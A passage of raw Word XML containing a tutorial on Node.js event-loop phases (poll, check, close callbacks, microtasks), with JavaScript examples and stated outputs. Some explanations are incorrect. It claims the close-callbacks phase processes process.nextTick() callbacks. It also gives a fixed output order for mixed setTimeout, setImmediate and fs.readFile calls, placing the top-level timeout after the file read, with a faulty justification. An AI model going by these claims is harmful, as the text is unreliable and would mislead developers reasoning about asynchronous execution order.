          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:pict w14:anchorId="4DB9E905">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC0F21"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t>3. Idle, Prepare Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3D0E33" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="696"/>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xml:space="preserve"> Used internally by Node.js to prepare the next poll phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D56909F" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="696"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Details:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> This phase is usually reserved for internal tasks and has little impact on user code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF6F249"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You won't often interact with this phase directly, as it is more of a maintenance phase managed by Node.js itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B9C225" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00000000" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:pict w14:anchorId="702D3609">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3959E74C"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t>4. Poll Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490B30FD" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>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xml:space="preserve"> This phase retrieves new I/O events and executes their corresponding callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6346B5" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749C5DB3" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This is the most important phase and has two main functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC394F7" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Executing I/O callbacks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> It processes I/O operations like reading files, network requests, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433681CD" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pausing and waiting for new I/O events:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> If there are no timers scheduled and no immediate tasks to process, the event loop can stay in this phase and wait for incoming events or callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1E668C" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Blocking vs. Non-Blocking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The event loop will continue to process tasks as long as there are callbacks waiting. If no tasks are pending and no timers need processing, the event loop can stay idle here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3250D0DE"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If you use fs.readFile() to read a file, its callback will be executed during the poll phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61699D7A"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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCB4071"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Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F73F0D7"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const fs = require('fs');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEB2E04"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fs.readFile('example.txt', 'utf8', (err, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125114FD"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 xml:space="preserve">  if (err) throw err;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9EF6F7"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 xml:space="preserve">  console.log(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C753F64"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290DBB1E" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00000000" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:pict w14:anchorId="117EF394">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED034EF"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lastRenderedPageBreak/>
        <w:t>5. Check Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648B6FCA" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="698"/>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xml:space="preserve"> Executes setImmediate() callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544C96B6" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="698"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Details:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The setImmediate() function schedules a callback to be executed immediately after the poll phase completes. It's similar to setTimeout(() =&gt; ..., 0) but operates differently because it always executes in this specific phase, whereas setTimeout executes in the timers phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193EA766"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0C4C32F0"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setImmediate(() =&gt; console.log('Immediate'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624AD736"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console.log('Main');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2F0B08"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369BCDE8"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Main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1236FB1A"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Immediate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624BC24D"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This ensures setImmediate executes after the current event loop phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F69E41C" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00000000" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:pict w14:anchorId="4E53356E">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C60BB5E"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t>6. Close Callbacks Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56010400" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="699"/>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xml:space="preserve"> Executes callbacks for closed events, such as close event handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000361C6" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="699"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Details:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> This phase handles the cleanup of resources like sockets, file streams, and process.nextTick() callbacks when a connection or resource is closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCAA061"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If you have an HTTP server with a close event, the associated callback executes in this phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148E1C90"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t>How the Event Loop Executes: An Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEA7C85"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consider the following example to illustrate the event loop phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEFCE2A"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setTimeout(() =&gt; console.log('Timeout'), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C52A9A"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setImmediate(() =&gt; console.log('Immediate'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37002DD6"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p>
    <w:p w14:paraId="1CEB470E"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fs = require('fs');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0911B589"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fs.readFile(__filename, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076E0D42"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console.log('File Read');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FF5134"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p>
    <w:p w14:paraId="14DB0286"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setTimeout(() =&gt; console.log('Timeout Inside Read'), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FC7EDC"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setImmediate(() =&gt; console.log('Immediate Inside Read'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619B8FE4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EC1318"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console.log('Main');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A53D76"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Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C33A51F"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mathematica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54525427"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Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7573375A"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Main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601F7A12"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Immediate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329AE07A"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File Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA27D49"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Immediate Inside Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AD58F9"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Timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033B2140"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Timeout Inside Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E775118" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="700"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Main: Executes first as it's part of the main thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126ECC15" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="700"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Immediate: Runs before the Timeout because setImmediate executes in the Check Phase, which comes after the Poll Phase. setTimeout(0) is scheduled for the Timers Phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F97FB40" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="700"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>File Read: Callback executes in the Poll Phase once the I/O operation completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448E93E0" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="700"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Immediate Inside Read: Executes in the Check Phase after the Poll Phase completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCBD91C" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="700"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Timeout and Timeout Inside Read: Both setTimeout callbacks execute during the Timers Phase in the next event loop iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2354CDC2" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Additional Information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07664301" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microtasks Queue:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> In addition to the event loop phases, there is a microtask queue that includes process.nextTick() and Promise callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79252153" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microtasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are processed immediately after the current operation completes, before moving to the next event loop phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207C748D"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Example with Microtasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61900163"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javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C922DB2"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Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEFF3BC"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setTimeout(() =&gt; console.log('Timeout'), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166646B2"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Promise.resolve().then(() =&gt; console.log('Promise'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB2D482"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process.nextTick(() =&gt; console.log('Next Tick'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238F61C2" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22"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console.log('Main');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA623EC" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFFC396"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Main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFF0E42"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Next Tick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD2DFBA"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Promise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DDD609" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D2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Timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1968EDAA" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="702"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Main executes first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697256CA" w14:textId="77777777" w:rsidR="00490D22" w:rsidRPr="00DA2F32" w:rsidRDefault="00490D22" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="702"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
